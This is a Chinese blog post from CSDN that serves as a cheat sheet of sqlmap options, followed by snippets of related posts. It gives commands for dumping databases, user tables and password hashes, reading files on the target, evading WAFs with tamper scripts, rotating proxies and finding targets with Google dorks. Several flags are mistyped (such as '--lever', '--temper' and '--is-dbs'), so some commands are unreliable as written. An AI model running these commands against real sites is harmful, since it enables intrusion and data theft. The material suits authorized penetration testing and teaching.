Sqlmap常用命令

最新推荐文章于 2025-06-07 15:38:40 发布
最新推荐文章于 2025-06-07 15:38:40 发布
阅读量1.3k 收藏 33
点赞数 42
CC 4.0 BY-SA版权
文章标签: sql windows centos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57699105/article/details/147709945
把http的请求头,保存成⼀个⽂件统⼀提交给sqlmap(post请求)

-r

sqlmap -r cookie.txt

测试期间经常访问的URL地址

--saf -url

查看版本信息

--version

sqlmap --version

查看常⽤功能参数

-h

sqlmap -h

查看数据库版本

-b

查看所有

-a

查看所有功能参数

-hh

sqlmap -hh

查看详细结构类型信息(结合使用)

--schema

sqlmap -u "http://example.com/vulnerable_page?id=1" --schema --dbs=mysql

查询数据库的版本信息

--banner

sqlmap -u "http://test.com/?id=1" --banner

从第N条记录开始提取(含N)

--start=N

从⽂件加载并使⽤安全的HTTP请求

--safe -req

当服务器端cookie有更新,可以使⽤--drop-set-cookie,放弃更新cookie

--drop -set -cookie

读取⽬标机器上的⽂件

--file-read

指定参数post数据

--data

sqlmap -u "http://example.com/vulnerable_page" --data="id=1&name=test"

发送带有特定cookie的请求

--cookie

关闭url编码,这种情况⽤于后端服务器不遵循RFC标准(URL编码的标准)并要求数据以⾮编码⽅式进⾏传输

--skip -urlencode

和-u⼀起⽤,-u后接的是https。让sqlmap知道⽬标⽤https交互

--force -ssl

获取当前登录数据库

--current -db

获取当前登录数据库使⽤的⽤户

--current-user

获取当前数据库用户权限的信息

--privileges

获取服务器主机名

--hostname

获取其他用户

--users

获取数据库用户的密码哈希值

--passwords

基于时间的注⼊检测相应延迟时间(默认5秒)

--time -sec

加载⽂本⽂件逐个扫描

-m

sqlmap -m url.txt

间隔1秒再进⾏探测

--delay 1

sqlmap -u "http://test.com/?id=1" --delay 1

检测SQL注⼊漏洞存在的技术类型B:Boolean-basedblind(布尔盲注)E:Error-based(报错注⼊)U:Unionquery-based(联合查询注⼊)S:Stackedqueries(⽂件系统,操作系统,注册表相关注⼊)T:Time-basedblind(时间盲注)默认全部使⽤

--technique

sqlmap -u "http://test.com/?id=1" --technique=B

检测级别,取值(1-5)默认情况下Sqlmap会测试所有GET参数和POST参数,当level⼤于等于2时会测试cookie参数,当level⼤于等于3时会测试UserAgent和Referer,当level=5时会测试Host头

--level 1

sqlmap -u "http://test.com/?id=1" --lever 1

检查⽬标数据库指纹信息已确认版本

-f

sqlmap -u "http://test.com/?id=1" -f

接连接数据库侦听端⼝

-d

sqlmap -d "mysql://root:root@192.168.1.200:33 06/test"

控制测试的有效性和潜在风险等级(1-3)

--risk

枚举表名称

--tables

sqlmap -u "http://test.com/?id=1" -D security --tables

枚举数据库名称

--dbs

sqlmap -u "http://test.com/?id=1" --dbs

枚举字段名称

--columns

sqlmap -u "http://test.com/?id=1" -D security -T users --columns

绕过Web应用防火墙(WAF)或过滤规则

--tamper

sqlmap -u "http://example.com/page?id=1" --tamper=tamper_script_name

tamper_script_name是脚本文件名称

使⽤脚本

--temper

sqlmap -u "http://test.com/?id=1" --temper=xxx.py

使⽤随机UA

--random-agent

sqlmap -u "http://test.com/?id=1" --random-agent

是否为数据库管理员

--is-dbs

搜索名称中包含特定关键词的表

--search

sqlmap -u "http://example.com/vulnerable_page?id=1" --search -T keyword

keyword是表中的关键词

探测是否可以提取数据库中实际执行的SQL语句

--statements

提取到第N条记录(含N)

--stop=N

需要输⼊⽤户密码会返回401,忽略则能继续探测

--ignore -401

有时候字符编码的问题,可能导致数据丢失,可以使⽤hex函数来避免

--hex

在http中把post数据发送到给定的安全URL地址

--safe -post

在两次访问给定安全位置之间测试请求

--safe -freq

指定referer

--referer

指定UA内容

--user-agent

sqlmap -u "http://test.com/?id=1" --user-agent=""Mozilla/5.0(X11; Linux x86_64; rv:68.0)Gecko/20100101"

指定url扫描,但url必须存在查询参数

-u

sqlmap -u "http://test.com/?id=1"

指定users表(前提指定数据库)

-T users

sqlmap -u "http://test.com/?id=1" -D security -T users --columns

指定表

-T

指定并行执行任务的线程数(1-10)

--threads 1

指定超时时间

--timeout

指定代理

--proxy

sqlmap -u "http://test.com/?id=1" --proxy "http://110.121.202.34:8000"

指定多个代理

--proxy-file

sqlmap -u "http://test.com/?id=1" --proxy-file=/root/proxy.txt

指定检查url⾥⾯某个变量

-p

sqlmap -u "http://test.com/?id=1" -p username --users

指定数据库

-D

指定数据库security

-D security

sqlmap -u "http://test.com/?id=1" -D security --tables

指定要使用的http请求方法(get、post)

--method

sqlmap -u "http://example.com/vulnerable_page" --method=POST --data="id=1&name=test"

指定重试次数

--retries

指定字段名(前提指定数据库和表)

-C

-C "username,pasword"

sqlmap -u "http://test.com/?id=1" -D security -T users -C "username,pasword"

转储获取到的信息

--dump

sqlmap -u "http://test.com/?id=1" --dump -D security -T users -C "username,pasword"

⽤google搜索

-g

sqlmap.py -g “inurl:”.php?id=1" ” \转 义字符

⾃动使⽤默认配置

--batch

sqlmap -u "http://test.com/?id=1" --batch

Ttntc
关注
sqlmap 常用命令
tryheart的博客
09-01 1371
常用命令 -u 指定目标URL (可以是http协议也可以是https协议) -d 连接数据库 –dbs 列出所有的数据库 –current-db 列出当前数据库 –tables 列出当前的表 –columns 列出当前的列 -D 选择使用哪个数据库 -T 选择使用哪个表 -C 选择使用哪个列 –dump 获取字段中的数据 –batch 自动选择yes –smart 启发式快速判断,节约浪费时间 –forms 尝试使用post注入 -r 加载文件中的HTTP请求(本地保存的请求包txt文件) -l 加载文件
sqlmap常用命令
qq_59009725的博客
09-23 1744
Sqlmap -u "url" -D指定数据库名 -T指定表名 -C指定字段名 --dump。Sqlmap -u "url" -D指定数据库名 -T指定表名 --columns。6,根据用户输入的参数内容,进行操作,查看库名,表名,字段名,获取数据。,不会再出现⾮预期的查询,这便是预编译能够防⽌SQL注⼊的根本原 因。Sqlmap -u "url" -D指定数据库名 --tables。3,union select 1,2,3查看数据回显。4,根据用户的选择,读取哪些数据。2,判断可以用哪种注入技术注入。
SQLMAP参数中文解说
收集盒 Book box
10-24 1039
#HiRoot's Blog  Options(选项):  --version 显示程序的版本号并退出  -h, --help 显示此帮助消息并退出  -v VERBOSE 详细级别:0-6(默认为1)    Target(目标):  以下至少需要设置其中一个选项,设置目标URL。    -d DIRECT 直接连接到数据库。  -u URL, --url=URL 目标URL。  -l LIST 
SQLmap常用命令
05-08
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,当然对于真实环境中这爆破功能战斗力基本为0....
【建议码住】纯纯干货,“渗透测试的瑞士军刀” Sqlmap常用手册!
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
06-07 569
相对于手工注入,sqlmap的高效注入大大提高了我们渗透效率。联合查询,在可以使用Union的情况下注入(注入效率最高,成本最低)报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中布尔盲注,即可以根据返回页面判断条件真假的注入延时注入,即不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已经执行(即页面返回时间是否增加)来判断堆叠查询,可以同时执行多条语句时的注入注入小技巧:有回显可以用联合查询,有报错可以用报错注入。
SQLmap命令大全
mmxhappy的专栏
01-25 2919
-delay=DELAY 在每个HTTP请求之间的延迟时间,单位为秒 --delay 0.5。--dbms=DBMS 强制后端的DBMS为此值 如:--dbms "Mysql"--proxy=PROXY 使用HTTP代理连接到目标URL --proxy。--random-agent 使用随机选定的HTTP User - Agent头。此外,您还可以运行您自己。--user-agent=AGENT 指定 HTTP User - Agent头。
【每天学习一点新知识】sqlmap的使用
RexHa的博客
10-04 633
sqlmap的基本使用
sqlmap常见命令
代码审计
03-09 978
sqlmap常用命令: 学习sqlmap的利用: sqlmap 自动化sql注入工具 -u 注入的url -r http请求包的地址 –data 以post形式提交的数据 –cookie cookie传递的值 –user-agent user-agent头 –referer referer值 –delay 相邻包之间的间隔时间 -p 指定优先注入的参数 –skip 跳过注入的参数 -v 3 payload 4 http请求包 –level 分5级 2: cookie 3: referer|user-age
Sqlmap 常用命令
Soul Blog
11-21 1066
Sqlmap 常用命令 Format sqlmap -u "required_url" parameter1, parameter2, parameter3 ... Basic parameters -dbs //all databases -tables //all tables -columns //all columns -dump //all items of columns -D [DBNAME] //specified database -T [TBLNAME] //specified
Sqlmap常用命令总结
jemus17的博客
02-26 5225
sql注入,sqlmap常用命令总结
SQLmap常用命令/使用教程
wangyuxiang946的博客
08-08 1万+
SQLmap是一款自动化SQL注入神器,用于SQL注入漏洞的检测和利用,支持多种数据库 检测位置 -u -- 指定url(GET请求) -p -- 指定参数(url包含多个参数时,指定参数) --data= -- 指定POST请求参数 --cookie -- 指定cookie参数 -r -- 从文件中加载HTTP请求(在需要检测的Header后面加上*) 获取数据 --dbs -- 获取数据库名 --tables -- 获取表名 --columns -- 获取字段名 --du
sqlmap命令大全
02-22
什么是SQLmapSQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令
【干货】sqlmap常用命令整理
qq_44005305的博客
03-04 1665
一、下载:1.1.1、官网:1.1.2、使用方法:1.2、kali二、常用命令:2.1、对指定目标进行默认配置测试2.2、对指定目标测试间隔设置2.3、获取并查看数据库信息2.4、设置测试等级2.5、其他命令:2.5.1、Target:(目标)2.5.2、Request:(请求)2.5.3、Optimization:(优化)2.5.4、Injection:(注入)2.5.5、Detectiong:(检测)2.5.6、Techniques:(技术)
SQLMAP 命令详解
安全苦行僧
05-30 490
SQLMAP 命令详解 Options(选项):–version 显示程序的版本号并退出-h, –help 显示此帮助消息并退出-v VERBOSE 详细级别:0-6(默认为 1)Target(目标):以下至少需要设置其中一个选项,设置目标 URL。-d DIRECT 直接连接到数据库。-u URL, –url=URL 目标 URL。-l LIST...
Sqlmap命令大全
热门推荐
学习、分享、交流
05-26 3万+
Sqlmap:开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能 够查看数据,文件系统访问,甚至能够操作系统命令执行。
sqlmap基本命令
武恩赐
04-28 1369
判断是否存在注入 sqlmap -u url 当注入点后面的参数大于等于两个时,url需要加双引号 查询当前用户下的所有数据库 sqlmap -u url –-dbs 用于查询当前用户下的所有数据库,前提是当前用户有权限读取包含所有数据库列表信息的表 获取数据库中的表名 sqlmap -u url -D 数据库名 –-tables -D是指定某一个具体的数据库,如果没有指定,则会列出数据库中所有的库的表 获取表中的字段名 sqlmap -u URL -D 数据库名 -T 表名 –-columns 获
sqlmap简单使用命令
weixin_36829246的博客
03-27 425
一、sqlmap常用基础命令 sqlmap Common operation command 以下命令顺序即为sql注入常见步骤。 sqlmap -u [“url”] --dbs #获取数据库 sqlmap -u [“url”] --current-user #获取当前用户名称 : sqlmap -u [“url”] --current-db #获取当前数据库名称 sqlmap -u [“url”...
Sqlmap常用命令
baidu_38844729的博客
06-01 603
常用参数 --is-dba 判断当前用户是否有管理员权限 --users 查看所有用户 --current-user 查看当前用户 --dbs 查看所有数据库 --current-db 查看当前数据库 -D test --tables 查看test数据库中的所有表 -D test -T users --columns 查看test数据库中user表的所有列 -D test -T users -C username --dump 查看test数据库中user表中username列
sqlmap使用命令
08-15
回答: sqlmap是一款用于自动化SQL注入和数据库接管的工具。以下是几个sqlmap的使用命令示例: 1. 使用-d参数连接到目标数据库: sqlmap -d "mysql://user:[email protected]:3386/dvwa",其中mysql表示数据库类型,user:password表示目标服务器的账号和密码,@后表示要连接的服务器,3386表示端口,dvwa表示要连接的数据库名称。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [sqlmap命令大全(附详细扫描流程)](https://blog.csdn.net/m0_50818626/article/details/130843335)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [Sqlmap命令大全](https://blog.csdn.net/phpppppppppp/article/details/124968358)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值